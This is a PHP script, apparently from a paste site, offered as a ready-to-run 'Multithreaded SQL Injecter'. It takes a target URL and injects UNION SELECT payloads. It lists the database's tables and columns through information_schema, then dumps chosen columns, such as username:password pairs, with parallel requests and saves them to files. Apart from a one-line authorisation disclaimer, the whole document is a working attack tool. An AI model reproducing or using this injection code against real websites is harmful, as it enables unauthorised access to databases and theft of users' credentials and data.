<?php
// Interactive command-line tool: the operator session is open-ended, so the
// script execution time limit is lifted before anything else runs.
set_time_limit(0);
/*******************************************************************************************************************************
*                                                           __    __                                    ____
*       __    __       __     __    __   ___      _____    |  |  |  |    _    _        ___    __       / ___\
*      /  \  /  \     |__|    \ \  / /  / _ \    /   __\   |__|__|__|   | |  | |      |   \  |  |     / /
*     /    \/    \    |  |     \ \/ /  / /_\ \  /   /___   |__|__|__|   | |  | |      |    \ |  |    | |  __
*    /  /\    /\  \   |  |      /  /  / /___\ \ |      /   |  |  |  |   | |__| |      |  |\ \|  |    | |_/ /
*   /__/  \__/  \__\  |__|     /__/  /_/     \_\ \____/    |__|  |__|    \______\     |__| \____|    |____/
--------------------------------------------------------------------------------------------------------------------------------
* Multithreaded SQL Injecter
*
* UNION-based MySQL injection helper driven from STDIN. It asks for a target
* URL, the number of columns in the UNION and the column that is reflected in
* the page, then reads version()/database(), lists tables and columns through
* information_schema and dumps chosen columns one row per request
* (LIMIT n,1) using parallel cURL transfers. Rows are printed and, for dumps
* of 20 rows or more, appended to a file under ./dumps/.
* Only use against systems you are explicitly authorised to test.
*
* Coded by Miyachung
* Miyachung@hotmail.com
* Special Thanks burtay
* Janissaries.Org
*******************************************************************************************************************************/
  18. if(!is_dir("dumps")){mkdir("dumps");}
  19.  
  20. echo "[+]Enter website: ";
  21. $site                      = fgets(STDIN);
  22. $site                      = str_replace("\r\n","",$site);
  23. $site                      = trim($site);
  24. if(!$site) exit("\n[-]Where is the website!");
  25. if(!preg_match('#http#',$site)) $site = "http://".$site;
  26. echo "[+]Enter column number: ";
  27. $colons                   = fgets(STDIN);
  28. $colons                      = str_replace("\r\n","",$colons);
  29. $colons                      = trim($colons);
  30. if(!$colons) exit("\n[-]Where is the columns!");
  31. echo "[+]Enter effected column: ";
  32. $effected                   = fgets(STDIN);
  33. $effected                  = str_replace("\r\n","",$effected);
  34. $effected                  = trim($effected);
  35. if(!$effected) exit("\n[-]Where is the effected column!");
  36. echo "[+]Advanced SQL Injecter\n";
  37. echo "[+]Coded by Miyachung || Janissaries.Org\n";
  38. $version_url              =    __make_SQL_URL($site,$colons,$effected,FALSE,TRUE,"",__hexEncode("<v3rsion>"),__hexEncode("</v3rsion>"),"version()");
  39. $version_page              = fetch($version_url);
  40. if(preg_match("#Illegal mix of collations for operation 'UNION'#si",$version_page))
  41. {
  42. exit("[-]Fail -> Illegal mix of collations for operation 'UNION'\n");
  43. }
  44. elseif(preg_match("#403 Forbidden#si",$version_page))
  45. {
  46. exit("[-]Fail -> 403 Forbidden\n");
  47. }
  48. $version_page              = __replace($version_page);
  49.  
  50. if(preg_match('#<v3rsion>#si',$version_page))
  51. {
  52. preg_match("/<v3rsion>(.*?)<\/v3rsion>/si",$version_page,$version);
  53. echo "[+]Version -> ".strip_tags($version[1])."\n";
  54. }
  55. else
  56. {
  57. exit("[-]Version not found\n");
  58. }
  59.  
  60. $database_url              = __make_SQL_URL($site,$colons,$effected,FALSE,TRUE,"",__hexEncode("<d4tabase>"),__hexEncode("</d4tabase>"),"database()");
  61. $database_page              = fetch($database_url);
  62. if(preg_match("#Illegal mix of collations for operation 'UNION'#si",$database_page))
  63. {
  64. exit("[-]Fail -> Illegal mix of collations for operation 'UNION'\n");
  65. }
  66. elseif(preg_match("#403 Forbidden#si",$database_page))
  67. {
  68. exit("[-]Fail -> 403 Forbidden\n");
  69. }
  70. $database_page              = __replace($database_page);
  71. if(preg_match('#<d4tabase>#si',$database_page))
  72. {
  73. preg_match("/<d4tabase>(.*?)<\/d4tabase>/si",$database_page,$database);
  74. echo "[+]Database -> ".strip_tags($database[1])."\n";
  75. }
  76. else
  77. {
  78. echo "[-]Database not found\n";
  79. }
  80. if(substr($version[1],0,1) == 5)
  81. {
  82. echo "[+]Version >= 5 getting tables,using information_schema.tables\n";
  83. }else{exit("[-]Version < 5 , sorry can't get the tables");}
  84.  
  85.  
  86. $table_counturl          = __make_SQL_URL($site,$colons,$effected,"+from+information_schema.tables+where+table_schema=database()",TRUE,"",__hexEncode("<t4blecount>"),__hexEncode("</t4blecount>"),"count(table_name)");
  87. $table_countpage      = fetch($table_counturl);
  88. $table_countpage      = __replace($table_countpage);
  89.  
  90. preg_match("/<t4blecount>(.*?)<\/t4blecount>/si",$table_countpage,$table_counted);
  91.  
  92. if($table_counted[1] == null)
  93. {
  94. exit("[-]Tables not found\n");
  95. }
  96. echo "[+]Total tables -> ".$table_counted[1]."\n";
  97.  
  98. for($xz=0;$xz<$table_counted[1];$xz++)
  99. {
  100. $table_url[]              = __make_SQL_URL($site,$colons,$effected,"+from+information_schema.tables+where+table_schema=database()",TRUE,$xz,__hexEncode("<t4bles>"),__hexEncode("</t4bles>"),"table_name");
  101. // $table_page              = fetch($table_url);
  102. // if(preg_match("#Illegal mix of collations for operation 'UNION'#si",$table_page))
  103. // {
  104. // exit("[-]Fail -> Illegal mix of collations for operation 'UNION'\n");
  105. // }
  106. // elseif(preg_match("#403 Forbidden#si",$table_page))
  107. // {
  108. // exit("[-]Fail -> 403 Forbidden\n");
  109. // }
  110. // $table_page              = __replace($table_page);
  111. // preg_match("/<t4bles>(.*?)<\/t4bles>/si",$table_page,$tables);
  112. // $tbls[] = strip_tags(trim($tables[1]));
  113. }
  114. $tbls    =    __threading($table_url,10,"/<t4bles>(.*?)<\/t4bles>/si",FALSE,FALSE);
  115. table_again:
  116. echo "\n";
  117. $tbls    =    array_values(array_unique(array_filter($tbls)));
  118. if(empty($tbls))
  119. {
  120. exit("[-]Can't get tables\n");
  121. }
  122. foreach($tbls as $tid => $tbl)
  123. {
  124. echo "[$tid]$tbl\n";
  125. }
  126. echo "\n[+]Choose a table for get columns,just type number (exit): ";
  127. $choose     = fgets(STDIN);
  128. $choose     = str_replace("\r\n","",$choose);
  129. $choose     = trim($choose);
  130.  
  131. if($choose == "exit")
  132. {
  133. exit("\n");
  134. }
  135. $selected   = $tbls[$choose];
  136.  
  137. $column_counturl    = __make_SQL_URL($site,$colons,$effected,"+from+information_schema.columns+where+table_name=0x".__hexEncode($selected)."",TRUE,"",__hexEncode("<c0lumnscount>"),__hexEncode("</c0lumnscount>"),"count(column_name)");
  138. $column_countpage    = fetch($column_counturl);
  139. $column_countpage    = __replace($column_countpage);
  140.  
  141. preg_match("/<c0lumnscount>(.*?)<\/c0lumnscount>/si",$column_countpage,$column_counted);
  142.  
  143. if($column_counted[1] == null || $column_counted[1] == 0)
  144. {
  145. echo "[-]Columns not found\n";
  146. goto table_again;
  147. }
  148. echo "[+]Total columns for $selected -> ".$column_counted[1]."\n";
  149.  
  150. for($xc=0;$xc<$column_counted[1];$xc++)
  151. {
  152. $column_url[]         = __make_SQL_URL($site,$colons,$effected,"+from+information_schema.columns+where+table_name=0x".__hexEncode($selected)."",TRUE,$xc,__hexEncode("<c0lumns>"),__hexEncode("</c0lumns>"),"column_name");
  153. // $column_page        = fetch($column_url);
  154. // if(preg_match("#Illegal mix of collations for operation 'UNION'#si",$column_page))
  155. // {
  156. // exit("[-]Fail -> Illegal mix of collations for operation 'UNION'\n");
  157. // }
  158. // elseif(preg_match("#403 Forbidden#si",$column_page))
  159. // {
  160. // exit("[-]Fail -> 403 Forbidden\n");
  161. // }
  162. // $column_page    = __replace($column_page);
  163. // preg_match("/<c0lumns>(.*?)<\/c0lumns>/si",$column_page,$columns);
  164. // $cols[] = strip_tags(trim($columns[1]));
  165. }
  166. $cols = __threading($column_url,5,"/<c0lumns>(.*?)<\/c0lumns>/si",FALSE,FALSE);
  167. col_showagain:
  168. echo "\n";
  169. $cols = array_values(array_unique(array_filter($cols)));
  170.     foreach($cols as $cid => $colname)
  171.     {
  172.         echo "[$cid]$colname\n";
  173.     }
  174.  
  175. what_again:
  176. echo "\n[+]What do you wanna do (dump,back,exit): ";
  177. $whatdo = fgets(STDIN);
  178. $whatdo = str_replace("\r\n","",$whatdo);
  179. $whatdo = trim($whatdo);
  180.  
  181. if($whatdo == "dump")
  182. {
  183. col_ask:
  184. echo "[+]Select dump column 1,just type number(back,exit): ";
  185. $select_col1 = fgets(STDIN);
  186. $select_col1 = str_replace("\r\n","",$select_col1);
  187. $select_col1 = trim($select_col1);
  188. if($select_col1 == "back")
  189. {
  190. goto col_showagain;
  191. }
  192. elseif($select_col1 == "exit")
  193. {
  194. exit("\n");
  195. }
  196.  
  197. echo "[+]Select dump column 2,type number(if you don't want just enter,back,exit): ";
  198. $select_col2 = fgets(STDIN);
  199. $select_col2 = str_replace("\r\n","",$select_col2);
  200. $select_col2 = trim($select_col2);
  201. if($select_col2 == "back")
  202. {
  203. goto col_ask;
  204. }
  205. elseif($select_col2 == "exit")
  206. {
  207. exit("\n");
  208. }
  209. elseif(!empty($select_col2))
  210. {
  211. $column2     = $cols[$select_col2];
  212. }
  213. $column1     = $cols[$select_col1];
  214.  
  215. $count_url  = __make_SQL_URL($site,$colons,$effected,"+from+$selected",TRUE,"",__hexEncode("<miyacount>"),__hexEncode("</miyacount>"),"count($column1)");
  216. $count_page = fetch($count_url);
  217. $count_page    = __replace($count_page);
  218. preg_match("/<miyacount>(.*?)<\/miyacount>/si",$count_page,$datacount);
  219. if(trim($datacount[1]) == null || $datacount[1] == 0)
  220. {
  221. echo "[-]Columns empty\n";
  222. goto col_showagain;
  223. }
  224. echo "[+]Total datas -> ".$datacount[1]."\n";
  225. echo "[+]Using LIMIT NULL,1 for dump\n\n";
  226. for($x=0;$x<=$datacount[1];$x++)
  227. {
  228.  
  229. if($column2)
  230. {
  231. $dump_url[]         = __make_SQL_URL($site,$colons,$effected,"+from+$selected",TRUE,$x,__hexEncode("<dumped>"),__hexEncode("</dumped>"),"$column1,0x3a,$column2");
  232. $filename            = "dumps/".__parse($site).",$column1"."_"."$column2.txt";
  233. }
  234. else
  235. {
  236. $dump_url[]         = __make_SQL_URL($site,$colons,$effected,"+from+$selected",TRUE,$x,__hexEncode("<dumped>"),__hexEncode("</dumped>"),"$column1");
  237. $filename            = "dumps/".__parse($site).",$column1.txt";
  238. }
  239. // $dump_page        = fetch($dump_url);
  240. // if(preg_match("#Illegal mix of collations for operation 'UNION'#si",$dump_page))
  241. // {
  242. // exit("[-]Fail -> Illegal mix of collations for operation 'UNION'\n");
  243. // }
  244. // elseif(preg_match("#403 Forbidden#si",$dump_page))
  245. // {
  246. // exit("[-]Fail -> 403 Forbidden\n");
  247. // }
  248. // $dump_page        = __replace($dump_page);
  249.  
  250. // if(preg_match("/<dumped>(.*?)<\/dumped>/si",$dump_page,$dumps))
  251. // {
  252. // $dump = $dumps[1];
  253. // echo strip_tags(trim("[$x]$dump"))."\n";
  254. // ob_flush();flush();
  255. // __dumpsave($filename,$dump."\r\n");
  256. // }
  257. }
  258. if($datacount[1] >= 20)
  259. {
  260. $dumps    =    __threading($dump_url,10,"/<dumped>(.*?)<\/dumped>/si",TRUE,TRUE,$filename);
  261. }
  262. else
  263. {
  264. $dumps    =    __threading($dump_url,10,"/<dumped>(.*?)<\/dumped>/si",TRUE,FALSE,"");
  265. }
  266. unset($column_url);
  267. unset($dump_url);
  268. goto col_showagain;
  269. }
  270. elseif($whatdo == "back")
  271. {
  272. unset($column_url);
  273. unset($cols);
  274. goto table_again;
  275. }
  276. elseif($whatdo == "exit")
  277. {
  278. exit("\n");
  279. }
  280. else
  281. {
  282. echo "[-]Unknown command\n";
  283. goto what_again;
  284. }
  285.  
  286.  
  287.  
  288. function fetch($url)
  289. {
  290. $curl     = curl_init();
  291. curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
  292. curl_setopt($curl,CURLOPT_URL,$url);
  293. curl_setopt($curl,CURLOPT_TIMEOUT,10);
  294. $oba    = curl_exec($curl);
  295. return $oba;
  296. }
  297. function __make_SQL_URL($site,$colons,$effected,$from,$concat,$limit,$hex1,$hex2,$what)
  298. {
  299. $colon_union               = range(1,$colons);
  300. if($concat)
  301. {
  302. $colon_union[$effected-1] = "concat(0x$hex1,$what,0x$hex2)";
  303. }
  304. else
  305. {
  306. $colon_union[$effected-1] = "group_concat(0x$hex1,$what,0x$hex2)";
  307. }
  308. $colon_union               = implode(",",$colon_union);
  309.  
  310. if($from)
  311. {
  312.  
  313. if($limit != null)
  314. {
  315. $url                      = $site."+and+1=0+union+select+".$colon_union.$from."+limit+$limit,1--";
  316. }else
  317. {
  318. $url                      = $site."+and+1=0+union+select+".$colon_union.$from."--";
  319. }
  320.  
  321. }else{
  322.  
  323. if($limit != null)
  324. {
  325. $url                      = $site."+and+1=0+union+select+".$colon_union."+limit+$limit,1--";
  326. }
  327. $url                      = $site."+and+1=0+union+select+".$colon_union."--";
  328. }
  329. return $url;
  330. }
  331. function __threading($urls,$thread,$regex,$yaz,$kaydet,$file=NULL)
  332. {
  333. $init = curl_multi_init();
  334. $urls = array_chunk($urls,$thread);
  335. $x = 0;
  336. foreach($urls as $url)
  337. {
  338.     for($i=0;$i<=count($url)-1;$i++)
  339.     {
  340.     $curl[$i] = curl_init();
  341.     curl_setopt($curl[$i],CURLOPT_RETURNTRANSFER,1);
  342.     curl_setopt($curl[$i],CURLOPT_URL,$url[$i]);
  343.     curl_setopt($curl[$i],CURLOPT_TIMEOUT,10);
  344.     curl_multi_add_handle($init,$curl[$i]);
  345.     }
  346.    
  347.     do{curl_multi_exec($init,$active);usleep(11);}while($active>0);
  348.    
  349.     foreach($curl as $cid => $page)
  350.     {
  351.     $content[$cid] = curl_multi_getcontent($page);
  352.     curl_multi_remove_handle($init,$page);
  353.     if(preg_match("#Illegal mix of collations for operation 'UNION'#si",$content[$cid]))
  354.     {
  355.     exit("[-]Fail -> Illegal mix of collations for operation 'UNION'\n");
  356.     }
  357.     elseif(preg_match("#403 Forbidden#si",$content[$cid]))
  358.     {
  359.     exit("[-]Fail -> 403 Forbidden\n");
  360.     }
  361.     preg_match($regex,$content[$cid],$veri);
  362.     if($yaz == TRUE)
  363.     {
  364.        
  365.         if(!empty($veri[1]) && preg_match("/[a-zA-Z0-9]:[a-zA-Z0-9]/si",$veri[1]))
  366.         {
  367.         $x++;
  368.         echo "[$x]$veri[1]\n";
  369.         ob_flush();flush();
  370.             if($kaydet == TRUE && $file != NULL)
  371.             {
  372.             $fopen = fopen($file,'ab');
  373.             fwrite($fopen,trim($veri[1])."\r\n");
  374.             fclose($fopen);
  375.             }
  376.         }
  377.     }
  378.     else
  379.     {
  380.     $veriler[] = $veri[1];
  381.     }
  382.    
  383.     }
  384. }
  385. return $veriler;
  386. }
  387. function __hexEncode($string)
  388. {
  389.    $hex='';
  390.     for ($i=0; $i < strlen($string); $i++)
  391.     {
  392.         $hex .= dechex(ord($string[$i]));
  393.     }
  394.     return $hex;
  395. }
  396. function __replace($text)
  397. {
  398. $text              = str_replace("&lt;","<",$text);
  399. $text              = str_replace("&gt;",">",$text);
  400. return $text;
  401. }
  402. function __dumpsave($file,$text)
  403. {
  404. $fp = fopen($file,'ab');
  405. fwrite($fp,$text);
  406. fclose($fp);
  407. return true;
  408. }
  409. function __parse($site)
  410. {
  411. $site = explode("/",$site);
  412. $site = $site[2];
  413. return $site;
  414. }
  415. ?>